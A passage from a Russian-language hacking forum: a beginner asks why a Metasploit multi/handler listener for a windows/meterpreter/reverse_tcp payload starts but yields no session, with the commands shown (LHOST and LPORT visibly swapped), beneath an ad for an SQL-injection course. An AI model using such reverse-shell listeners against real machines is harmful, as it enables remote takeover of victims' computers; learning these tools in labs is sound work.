• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проблема с Metasploit'ом

W

WHello

Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 4444
msf exploit(multi/handler) > set LPORT 192.168.0.101
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.101

Меня лично уже настораживает вторая строка. Ни в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи. Использую Windows 10, в Kali 2.0 такая же проблема. Версия metasploit 4.16.37. В чем проблема, как ее решить?
 

Urfin--Juice

Gold Team
14.11.2017
203
74
BIT
0
Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.
Код:
msf > use exploit/multi/handler